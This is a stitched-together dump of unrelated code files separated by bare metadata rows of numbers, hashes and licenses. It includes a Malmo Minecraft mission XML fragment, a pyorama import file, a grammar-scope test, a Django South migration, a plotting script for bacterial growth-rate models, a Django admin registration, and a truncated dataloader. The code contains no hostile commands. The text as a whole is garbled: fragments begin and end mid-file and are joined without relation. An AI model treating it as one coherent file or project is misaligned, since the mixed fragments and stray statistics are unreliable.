<Mission xmlns="http://ProjectMalmo.microsoft.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<About>
<Summary>Hello world!</Summary>
</About>
<ServerSection>
<ServerInitialConditions>
<Time>
<StartTime>12000</StartTime>
<AllowPassageOfTime>false</AllowPassageOfTime>
</Time>
<Weather>clear</Weather>
</ServerInitialConditions>
<ServerHandlers>
<FlatWorldGenerator generatorString="3;7,44*49,73,35:1,159:4,95:13,35:13,159:11,95:10,159:14,159:6,35:6,95:6;12;"/>
<DrawingDecorator>
<DrawLine x1="20" y1="56" z1="-20" x2="20" y2="56" z2="100" type = "sand"/>
<DrawLine x1="11" y1="56" z1="-20" x2="-50" y2="56" z2="-20" type = "gold_block"/>
<DrawLine x1="-20" y1="56" z1="-8" x2="-20" y2="56" z2="20" type = "brick_block"/>
<DrawLine x1="-10" y1="56" z1="20" x2="9" y2="56" z2="20" type = "diamond_block"/>
</DrawingDecorator>
<ServerQuitFromTimeUp timeLimitMs="300000"/>
<ServerQuitWhenAnyAgentFinishes/>
</ServerHandlers>
</ServerSection>
<AgentSection mode="Survival">
<Name>MalmoTutorialBot</Name>
<AgentStart>
<Placement x="0.5" y="56" z="0.5" yaw="0"/>
</AgentStart>
<AgentHandlers>
<VideoProducer want_depth="false">
<Width>''' + str(WIDTH) + '''</Width>
<Height>''' + str(HEIGHT) + '''</Height>
</VideoProducer>
<ObservationFromGrid>
<Grid name="floor3x3">
<min x="-1" y="0" z="-1"/>
<max x="1" y="0" z="1"/>
</Grid>
</ObservationFromGrid>
<ObservationFromFullStats/>
<DiscreteMovementCommands />
</AgentHandlers>
</AgentSection>
</Mission>'''
mission3HeightXML = '''<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<Mission xmlns="http://ProjectMalmo.microsoft.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<About>
<Summary>Hello world!</Summary>
</About>
<ServerSection>
<ServerInitialConditions>
<Time>
<StartTime>12000</StartTime>
<AllowPassageOfTime>false</AllowPassageOfTime>
</Time>
<Weather>clear</Weather>
</ServerInitialConditions>
<ServerHandlers>
<FlatWorldGenerator generatorString="3;7,44*49,73,35:1,159:4,95:13,35:13,159:11,95:10,159:14,159:6,35:6,95:6;12;"/>
<DrawingDecorator>
<DrawLine x1="20" y1="56" z1="-20" x2="20" y2="56" z2="100" type = "sand"/>
<DrawLine x1="20" y1="57" z1="-20" x2="20" y2="57" z2="100" type = "sand"/>
<DrawLine x1="20" y1="58" z1="-20" x2="20" y2="58" z2="100" type = "sand"/>
<DrawLine x1="20" y1="59" z1="-20" x2="20" y2="59" z2="100" type = "sand"/>
<DrawLine x1="11" y1="56" z1="-20" x2="-50" y2="56" z2="-20" type = "gold_block"/>
<DrawLine x1="11" y1="57" z1="-20" x2="-50" y2="57" z2="-20" type = "gold_block"/>
<DrawLine x1="11" y1="58" z1="-20" x2="-50" y2="58" z2="-20" type = "gold_block"/>
<DrawLine x1="11" y1="59" z1="-20" x2="-50" y2="59" z2="-20" type = "gold_block"/>
<DrawLine x1="-20" y1="56" z1="-8" x2="-20" y2="56" z2="20" type = "brick_block"/>
<DrawLine x1="-20" y1="57" z1="-8" x2="-20" y2="57" z2="20" type = "brick_block"/>
<DrawLine x1="-20" y1="58" z1="-8" x2="-20" y2="58" z2="20" type = "brick_block"/>
<DrawLine x1="-20" y1="59" z1="-8" x2="-20" y2="59" z2="20" type = "brick_block"/>
<DrawLine x1="-10" y1="56" z1="20" x2="9" y2="56" z2="20" type = "diamond_block"/>
<DrawLine x1="-10" y1="57" z1="20" x2="9" y2="57" z2="20" type = "diamond_block"/>
<DrawLine x1="-10" y1="58" z1="20" x2="9" y2="58" z2="20" type = "diamond_block"/>
<DrawLine x1="-10" y1="59" z1="20" x2="9" y2="59" z2="20" type = "diamond_block"/>
</DrawingDecorator>
<ServerQuitFromTimeUp timeLimitMs="300000"/>
<ServerQuitWhenAnyAgentFinishes/>
</ServerHandlers>
</ServerSection>
<AgentSection mode="Survival">
<Name>MalmoTutorialBot</Name>
<AgentStart>
<Placement x="0.5" y="56" z="0.5" yaw="0"/>
</AgentStart>
<AgentHandlers>
<VideoProducer want_depth="false">
<Width>''' + str(WIDTH) + '''</Width>
<Height>''' + str(HEIGHT) + '''</Height>
</VideoProducer>
<ObservationFromGrid>
<Grid name="floor3x3">
<min x="-1" y="0" z="-1"/>
<max x="1" y="0" z="1"/>
</Grid>
</ObservationFromGrid>
<ObservationFromFullStats/>
<DiscreteMovementCommands />
</AgentHandlers>
</AgentSection>
</Mission>'''
| 49.267016
| 133
| 0.434857
| 942
| 9,410
| 4.308917
| 0.121019
| 0.068983
| 0.070214
| 0.034491
| 0.979305
| 0.941365
| 0.935452
| 0.935452
| 0.921163
| 0.867948
| 0
| 0.129782
| 0.391605
| 9,410
| 190
| 134
| 49.526316
| 0.579214
| 0
| 1
| 0.802469
| 0
| 0.228395
| 0.974601
| 0.136982
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.018519
| 0.006173
| 0
| 0.006173
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
702b290968d0faad6fa1e1d03c5792c5e9c52190
| 120
|
py
|
Python
|
pyorama/event/__init__.py
|
AnishN/Pyorama
|
e16389336e1c4969165967fe208b5b260188f57f
|
[
"MIT"
] | null | null | null |
pyorama/event/__init__.py
|
AnishN/Pyorama
|
e16389336e1c4969165967fe208b5b260188f57f
|
[
"MIT"
] | null | null | null |
pyorama/event/__init__.py
|
AnishN/Pyorama
|
e16389336e1c4969165967fe208b5b260188f57f
|
[
"MIT"
] | null | null | null |
from pyorama.event.event_system import *
from pyorama.event.input_events import *
from pyorama.event.listener import *
| 40
| 41
| 0.816667
| 17
| 120
| 5.647059
| 0.470588
| 0.34375
| 0.5
| 0.458333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108333
| 120
| 3
| 42
| 40
| 0.897196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3b3f657e951e2cae809b3defbf987f18f400cf92
| 3,382
|
py
|
Python
|
test/expressions/expr6.py
|
kylebarron/MagicPython
|
da6fa0793e2c85d3bf7709ff1d4f65ccf468db11
|
[
"MIT"
] | 1,482
|
2015-10-16T21:59:32.000Z
|
2022-03-30T11:44:40.000Z
|
test/expressions/expr6.py
|
kylebarron/MagicPython
|
da6fa0793e2c85d3bf7709ff1d4f65ccf468db11
|
[
"MIT"
] | 226
|
2015-10-15T15:53:44.000Z
|
2022-03-25T03:08:27.000Z
|
test/expressions/expr6.py
|
kylebarron/MagicPython
|
da6fa0793e2c85d3bf7709ff1d4f65ccf468db11
|
[
"MIT"
] | 129
|
2015-10-20T02:41:49.000Z
|
2022-03-22T01:44:36.000Z
|
a = (a, b(a=1), {c: d(b=1), e: [a, b(z=1)]})
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
( : punctuation.parenthesis.begin.python, source.python
a : source.python
, : punctuation.separator.element.python, source.python
: source.python
b : meta.function-call.generic.python, meta.function-call.python, source.python
( : meta.function-call.python, punctuation.definition.arguments.begin.python, source.python
a : meta.function-call.arguments.python, meta.function-call.python, source.python, variable.parameter.function-call.python
= : keyword.operator.assignment.python, meta.function-call.arguments.python, meta.function-call.python, source.python
1 : constant.numeric.dec.python, meta.function-call.arguments.python, meta.function-call.python, source.python
) : meta.function-call.python, punctuation.definition.arguments.end.python, source.python
, : punctuation.separator.element.python, source.python
: source.python
{ : punctuation.definition.dict.begin.python, source.python
c : source.python
: : punctuation.separator.dict.python, source.python
: source.python
d : meta.function-call.generic.python, meta.function-call.python, source.python
( : meta.function-call.python, punctuation.definition.arguments.begin.python, source.python
b : meta.function-call.arguments.python, meta.function-call.python, source.python, variable.parameter.function-call.python
= : keyword.operator.assignment.python, meta.function-call.arguments.python, meta.function-call.python, source.python
1 : constant.numeric.dec.python, meta.function-call.arguments.python, meta.function-call.python, source.python
) : meta.function-call.python, punctuation.definition.arguments.end.python, source.python
, : punctuation.separator.element.python, source.python
: source.python
e : source.python
: : punctuation.separator.dict.python, source.python
: source.python
[ : punctuation.definition.list.begin.python, source.python
a : source.python
, : punctuation.separator.element.python, source.python
: source.python
b : meta.function-call.generic.python, meta.function-call.python, source.python
( : meta.function-call.python, punctuation.definition.arguments.begin.python, source.python
z : meta.function-call.arguments.python, meta.function-call.python, source.python, variable.parameter.function-call.python
= : keyword.operator.assignment.python, meta.function-call.arguments.python, meta.function-call.python, source.python
1 : constant.numeric.dec.python, meta.function-call.arguments.python, meta.function-call.python, source.python
) : meta.function-call.python, punctuation.definition.arguments.end.python, source.python
] : punctuation.definition.list.end.python, source.python
} : punctuation.definition.dict.end.python, source.python
) : punctuation.parenthesis.end.python, source.python
| 69.020408
| 134
| 0.666765
| 373
| 3,382
| 6.045576
| 0.08311
| 0.234146
| 0.311308
| 0.234146
| 0.96408
| 0.925942
| 0.877605
| 0.858537
| 0.858537
| 0.858537
| 0
| 0.002269
| 0.218214
| 3,382
| 48
| 135
| 70.458333
| 0.850605
| 0
| 0
| 0.688889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d9093b74be1c364ab7aa898e4ab62a2db9e182f1
| 3,277
|
py
|
Python
|
dali/gallery/migrations/0002_auto__chg_field_picture_description__chg_field_gallery_description.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | 1
|
2016-05-08T11:45:54.000Z
|
2016-05-08T11:45:54.000Z
|
dali/gallery/migrations/0002_auto__chg_field_picture_description__chg_field_gallery_description.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | null | null | null |
dali/gallery/migrations/0002_auto__chg_field_picture_description__chg_field_gallery_description.py
|
varikin/dali
|
07229a59c577431980588a3ee75cdbf80fc72da6
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Picture.description'
db.alter_column('gallery_picture', 'description', self.gf('ckeditor.fields.HTMLField')(null=True))
# Changing field 'Gallery.description'
db.alter_column('gallery_gallery', 'description', self.gf('ckeditor.fields.HTMLField')(null=True))
def backwards(self, orm):
# Changing field 'Picture.description'
db.alter_column('gallery_picture', 'description', self.gf('django.db.models.fields.TextField')(null=True))
# Changing field 'Gallery.description'
db.alter_column('gallery_gallery', 'description', self.gf('django.db.models.fields.TextField')(null=True))
models = {
'gallery.gallery': {
'Meta': {'ordering': "('order',)", 'object_name': 'Gallery'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('ckeditor.fields.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'order': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'parent_gallery': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Gallery']", 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'gallery.picture': {
'Meta': {'ordering': "('order',)", 'object_name': 'Picture'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('ckeditor.fields.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'gallery': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Gallery']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'order': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'original': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'viewable': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'})
}
}
complete_apps = ['gallery']
| 57.491228
| 148
| 0.590479
| 338
| 3,277
| 5.627219
| 0.221893
| 0.088328
| 0.147213
| 0.210305
| 0.83123
| 0.802839
| 0.802839
| 0.802839
| 0.774448
| 0.700315
| 0
| 0.007877
| 0.186451
| 3,277
| 56
| 149
| 58.517857
| 0.705551
| 0.049741
| 0
| 0.3
| 0
| 0
| 0.52381
| 0.287645
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.1
| 0
| 0.225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d92f91c0d3365fa039cf0667cc7f1eea0ecf1b45
| 12,095
|
py
|
Python
|
code/figures/presentation_figures/reg_scenarios_other_organisms.py
|
gchure/modelling_growth
|
764d7aee4d0d562cd5e1b6e21b534ab465d1d672
|
[
"MIT"
] | null | null | null |
code/figures/presentation_figures/reg_scenarios_other_organisms.py
|
gchure/modelling_growth
|
764d7aee4d0d562cd5e1b6e21b534ab465d1d672
|
[
"MIT"
] | null | null | null |
code/figures/presentation_figures/reg_scenarios_other_organisms.py
|
gchure/modelling_growth
|
764d7aee4d0d562cd5e1b6e21b534ab465d1d672
|
[
"MIT"
] | null | null | null |
#%%
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import growth.viz
import growth.model
colors, palette = growth.viz.matplotlib_style()
#%%
SHOW_DATA = False
# Load the relevant data
marip = pd.read_csv('../../../data/Mueller2021.csv')
# elong_data = pd.read_csv('../../../data/dai2016_elongation_rate.csv')
#%%
# Set up the parameter values/ranges
gamma_max = 5 * 3600 / 7459
nu_max = np.linspace(0.01, 10, 300)
Kd = 0.02
phi_O = 0.7
phi_R_const = 0.1
# Scenario 1 -- Constant allocation parameters
const_phiR_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, phi_R_const,
1-phi_O - phi_R_const,
Kd)
const_phiR_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - phi_R_const,
const_phiR_lam)
const_phiR_gamma = growth.model.translation_rate(gamma_max, const_phiR_tRNA, Kd)
# Scenario 2 -- Translation rate maximization
max_gamma_phi_R = growth.model.phi_R_max_translation(gamma_max, nu_max, phi_O)
max_gamma_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, max_gamma_phi_R,
1-phi_O-max_gamma_phi_R,
Kd)
max_gamma_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - max_gamma_phi_R,
max_gamma_lam)
# Scenario 3 -- Growth rate maximization
opt_phi_R = growth.model.phi_R_optimal_allocation(gamma_max, nu_max, Kd, phi_O)
opt_allo_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, opt_phi_R,
1 - phi_O - opt_phi_R,
Kd)
lam_range = np.linspace(0, 3, 300)
phiP = 1 - phi_O - opt_phi_R
opt_allo_lam_closed = - lam_range * (Kd * lam_range - lam_range + nu_max * phiP) / (gamma_max * (lam_range - nu_max * phiP))
opt_allo_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - opt_phi_R,
opt_allo_lam)
opt_allo_gamma = growth.model.translation_rate(gamma_max, opt_allo_tRNA, Kd)
fig, ax = plt.subplots(1, 2, figsize=(6, 2))
for a in ax:
a.set_xlabel('growth rate [hr$^{-1}$]')
ax[0].set_ylabel('ribosomal mass fraction $\phi_R$')
ax[1].set_ylabel('elongation rate [AA / sec]')
ax[0].plot(const_phiR_lam, phi_R_const * np.ones(len(const_phiR_lam)), lw=1,
color=colors['primary_purple'], label='constant allocation')
ax[0].plot(max_gamma_lam, max_gamma_phi_R, lw=1, label='maximal elongation rate',
color=colors['primary_green'])
ax[0].plot(opt_allo_lam, opt_phi_R, lw=1, label='maximal growth rate',
color=colors['primary_blue'])
# Mass frac data
markers = ['X', 'o', 's', '^', 'v', '>']
count = 0
ax[0].plot(marip['growth_rate_hr'], marip['mass_frac'], 'o', label='Müller & Gu et al. 2021')
# for g, d in frac_data.groupby('source'):
# ax[0].plot(d['growth_rate_hr'], d['mass_fraction'], marker=markers[count],
# color=colors['primary_black'], linestyle='none', ms=5, alpha=0.75,
# label=g, zorder=1000)
# count += 1
# ax[1].plot(elong_data['growth_rate_hr'], elong_data['elongation_rate_aa_s'], 'o',
# ms=5, color=colors['primary_black'], alpha=0.75, zorder=1000)
ax[1].plot(const_phiR_lam, const_phiR_gamma * (7459/3600), '-', lw=1, color=colors['primary_purple'])
ax[1].plot(max_gamma_lam, gamma_max * np.ones(len(max_gamma_lam)) * (7459/3600), lw=1, color=colors['primary_green'], label='maximal elongation rate')
ax[1].plot(opt_allo_lam, opt_allo_gamma * (7459/3600), '-', lw=1, color=colors['primary_blue'], label='maximal growth rate')
ax[0].legend(fontsize=5)
plt.subplots_adjust(wspace=0.3)
plt.savefig('../../../figures/presentations/maripaludis_data.pdf')
# if SHOW_DATA:
# plt.savefig('../../../figures/presentations/ecoli_regulatory_scenarios_data.pdf')
# else:
# plt.savefig('../../../figures/presentations/ecoli_regulatory_scenarios_nodata.pdf')
# %%
#%%
# Load the relevant data
crassa = pd.read_csv('../../../data/Alberghina1974.csv')
# elong_data = pd.read_csv('../../../data/dai2016_elongation_rate.csv')
# Set up the parameter values/ranges
gamma_max = 15 * 3600 / 1E4
nu_max = np.linspace(0.01, 10, 300)
Kd = 0.02
phi_O = 0.3
phi_R_const = 0.1
# Scenario 1 -- Constant allocation parameters
const_phiR_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, phi_R_const,
1-phi_O - phi_R_const,
Kd)
const_phiR_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - phi_R_const,
const_phiR_lam)
const_phiR_gamma = growth.model.translation_rate(gamma_max, const_phiR_tRNA, Kd)
# Scenario 2 -- Translation rate maximization
max_gamma_phi_R = growth.model.phi_R_max_translation(gamma_max, nu_max, phi_O)
max_gamma_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, max_gamma_phi_R,
1-phi_O-max_gamma_phi_R,
Kd)
max_gamma_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - max_gamma_phi_R,
max_gamma_lam)
# Scenario 3 -- Growth rate maximization
opt_phi_R = growth.model.phi_R_optimal_allocation(gamma_max, nu_max, Kd, phi_O)
opt_allo_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, opt_phi_R,
1 - phi_O - opt_phi_R,
Kd)
lam_range = np.linspace(0, 3, 300)
phiP = 1 - phi_O - opt_phi_R
opt_allo_lam_closed = - lam_range * (Kd * lam_range - lam_range + nu_max * phiP) / (gamma_max * (lam_range - nu_max * phiP))
opt_allo_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - opt_phi_R,
opt_allo_lam)
opt_allo_gamma = growth.model.translation_rate(gamma_max, opt_allo_tRNA, Kd)
fig, ax = plt.subplots(1, 2, figsize=(6, 2))
for a in ax:
a.set_xlabel('growth rate [hr$^{-1}$]')
ax[0].set_ylabel('ribosomal mass fraction $\phi_R$')
ax[1].set_ylabel('elongation rate [AA / sec]')
ax[0].plot(const_phiR_lam, phi_R_const * np.ones(len(const_phiR_lam)), lw=1,
color=colors['primary_purple'], label='constant allocation')
ax[0].plot(max_gamma_lam, max_gamma_phi_R, lw=1, label='maximal elongation rate',
color=colors['primary_green'])
ax[0].plot(opt_allo_lam, opt_phi_R, lw=1, label='maximal growth rate',
color=colors['primary_blue'])
ax[0].set_xlim([0, 1])
ax[0].set_ylim([0, 0.3])
ax[1].set_xlim([0, 1])
# Mass frac data
markers = ['X', 'o', 's', '^', 'v', '>']
count = 0
ax[0].plot(crassa['growth_rate'], crassa['mass_fraction'], 'o', label='Alberghina 1974')
ax[1].plot(crassa['growth_rate'], crassa['elongation_rate'], 'o', label='Alberghina 1974')
# for g, d in frac_data.groupby('source'):
# ax[0].plot(d['growth_rate_hr'], d['mass_fraction'], marker=markers[count],
# color=colors['primary_black'], linestyle='none', ms=5, alpha=0.75,
# label=g, zorder=1000)
# count += 1
# ax[1].plot(elong_data['growth_rate_hr'], elong_data['elongation_rate_aa_s'], 'o',
# ms=5, color=colors['primary_black'], alpha=0.75, zorder=1000)
ax[1].plot(const_phiR_lam, const_phiR_gamma * (1E4/3600), '-', lw=1, color=colors['primary_purple'])
ax[1].plot(max_gamma_lam, gamma_max * np.ones(len(max_gamma_lam)) * (1E4/3600), lw=1, color=colors['primary_green'], label='maximal elongation rate')
ax[1].plot(opt_allo_lam, opt_allo_gamma * (1E4/3600), '-', lw=1, color=colors['primary_blue'], label='maximal growth rate')
ax[0].legend(fontsize=5)
plt.subplots_adjust(wspace=0.3)
plt.savefig('../../../figures/presentations/crassa_data.pdf')
# if SHOW_DATA:
# plt.savefig('../../../figures/presentations/ecoli_regulatory_scenarios_data.pdf')
# else:
# plt.savefig('../../../figures/presentations/ecoli_regulatory_scenarios_nodata.pdf')
# %%
coel = pd.read_csv('../../../data/Cox2004_Table3-4.csv')
coel = coel[coel['organism']=='Streptomyces coelicolor']
#%%
# Set up the parameter values/ranges
gamma_max = 5 * 3600 / 7459
nu_max = np.linspace(0.01, 10, 300)
Kd = 0.05
phi_O = 0.3
phi_R_const = 0.1
# Scenario 1 -- Constant allocation parameters
const_phiR_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, phi_R_const,
1-phi_O - phi_R_const,
Kd)
const_phiR_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - phi_R_const,
const_phiR_lam)
const_phiR_gamma = growth.model.translation_rate(gamma_max, const_phiR_tRNA, Kd)
# Scenario 2 -- Translation rate maximization
max_gamma_phi_R = growth.model.phi_R_max_translation(gamma_max, nu_max, phi_O)
max_gamma_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, max_gamma_phi_R,
1-phi_O-max_gamma_phi_R,
Kd)
max_gamma_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - max_gamma_phi_R,
max_gamma_lam)
# Scenario 3 -- Growth rate maximization
opt_phi_R = growth.model.phi_R_optimal_allocation(gamma_max, nu_max, Kd, phi_O)
opt_allo_lam = growth.model.steady_state_growth_rate(gamma_max, nu_max, opt_phi_R,
1 - phi_O - opt_phi_R,
Kd)
lam_range = np.linspace(0, 3, 300)
phiP = 1 - phi_O - opt_phi_R
opt_allo_lam_closed = - lam_range * (Kd * lam_range - lam_range + nu_max * phiP) / (gamma_max * (lam_range - nu_max * phiP))
opt_allo_tRNA = growth.model.steady_state_tRNA_balance(nu_max, 1 - phi_O - opt_phi_R,
opt_allo_lam)
opt_allo_gamma = growth.model.translation_rate(gamma_max, opt_allo_tRNA, Kd)
fig, ax = plt.subplots(1, 2, figsize=(6, 2))
for a in ax:
a.set_xlabel('growth rate [hr$^{-1}$]')
ax[0].set_ylabel('ribosomal mass fraction $\phi_R$')
ax[1].set_ylabel('elongation rate [AA / sec]')
ax[0].plot(const_phiR_lam, phi_R_const * np.ones(len(const_phiR_lam)), lw=1,
color=colors['primary_purple'], label='constant allocation')
ax[0].plot(max_gamma_lam, max_gamma_phi_R, lw=1, label='maximal elongation rate',
color=colors['primary_green'])
ax[0].plot(opt_allo_lam, opt_phi_R, lw=1, label='maximal growth rate',
color=colors['primary_blue'])
ax[0].set_xlim([0, 1])
ax[0].set_ylim([0, 0.3])
ax[1].set_xlim([0, 1])
# Mass frac data
markers = ['X', 'o', 's', '^', 'v', '>']
count = 0
ax[0].plot(coel['growth_rate_hr'], coel['ribosomal_mass_fraction'], 'o', label='Cox 2004')
ax[1].plot(coel['growth_rate_hr'], coel['elongation_rate_aa_sec'], 'o', label='Cox 2004')
ax[1].plot(const_phiR_lam, const_phiR_gamma * (7459/3600), '-', lw=1, color=colors['primary_purple'])
ax[1].plot(max_gamma_lam, gamma_max * np.ones(len(max_gamma_lam)) * (7459/3600), lw=1, color=colors['primary_green'], label='maximal elongation rate')
ax[1].plot(opt_allo_lam, opt_allo_gamma * (7459/3600), '-', lw=1, color=colors['primary_blue'], label='maximal growth rate')
ax[0].legend(fontsize=5)
plt.subplots_adjust(wspace=0.3)
plt.savefig('../../../figures/presentations/coelicolor_data.pdf')
# if SHOW_DATA:
# plt.savefig('../../../figures/presentations/ecoli_regulatory_scenarios_data.pdf')
# else:
# plt.savefig('../../../figures/presentations/ecoli_regulatory_scenarios_nodata.pdf')
# %%
| 47.431373
| 150
| 0.628028
| 1,784
| 12,095
| 3.942265
| 0.089126
| 0.032419
| 0.056306
| 0.056306
| 0.924072
| 0.917247
| 0.91156
| 0.906441
| 0.905588
| 0.905588
| 0
| 0.038606
| 0.23117
| 12,095
| 254
| 151
| 47.61811
| 0.717712
| 0.181232
| 0
| 0.838509
| 0
| 0
| 0.132284
| 0.029137
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037267
| 0
| 0.037267
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9401ad8b3280388fb096d20c334fb120c11571e
| 801
|
py
|
Python
|
provisioning/admin.py
|
luisza/vcl_django
|
43d04f7951cb8805502e51f6f6360c7ec63215cc
|
[
"Apache-2.0"
] | null | null | null |
provisioning/admin.py
|
luisza/vcl_django
|
43d04f7951cb8805502e51f6f6360c7ec63215cc
|
[
"Apache-2.0"
] | null | null | null |
provisioning/admin.py
|
luisza/vcl_django
|
43d04f7951cb8805502e51f6f6360c7ec63215cc
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from provisioning.models import (Provisioning,
Provisioningosinstalltype,
Resourcetype,
Resource,
Resourcegroup,
Resourcegroupmembers,
Resourcemap,
Statgraphcache)
admin.site.register([Provisioning,
Provisioningosinstalltype,
Resourcetype,
Resource,
Resourcegroup,
Resourcegroupmembers,
Resourcemap,
Statgraphcache])
| 38.142857
| 62
| 0.405743
| 32
| 801
| 10.15625
| 0.5625
| 0.227692
| 0.301538
| 0.350769
| 0.707692
| 0.707692
| 0.707692
| 0.707692
| 0
| 0
| 0
| 0
| 0.561798
| 801
| 21
| 63
| 38.142857
| 0.925926
| 0.032459
| 0
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.117647
| 0
| 0.117647
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
79739a95e7de8d0230977c5bc8d42fc4928eb2a5
| 18,363
|
py
|
Python
|
data/dataloader.py
|
clovaai/c3_sinet
|
636245fd90cd88e5f851b340befee8d48865e965
|
[
"MIT"
] | 43
|
2019-12-30T06:20:51.000Z
|
2022-01-07T03:30:29.000Z
|
data/dataloader.py
|
hwany-j/c3_sinet
|
b92911b4bcd8edf003da1537b2ab8e0b3169af56
|
[
"MIT"
] | 2
|
2020-06-09T19:25:44.000Z
|
2021-01-17T12:04:41.000Z
|
data/dataloader.py
|
hwany-j/c3_sinet
|
b92911b4bcd8edf003da1537b2ab8e0b3169af56
|
[
"MIT"
] | 16
|
2019-12-30T06:21:04.000Z
|
2021-11-24T03:56:30.000Z
|
import os
import data.CVTransforms as cvTransforms
import data.PILTransform as pilTransforms
from torch.utils import data
from torchvision import datasets
import torchvision.transforms as transforms
import data.DataSet as myDataLoader
import torch
import data.loadData as ld
import pickle
def cityPIL_Doublerandscalecrop( cached_data_file, data_dir, classes, batch_size, num_work=6,
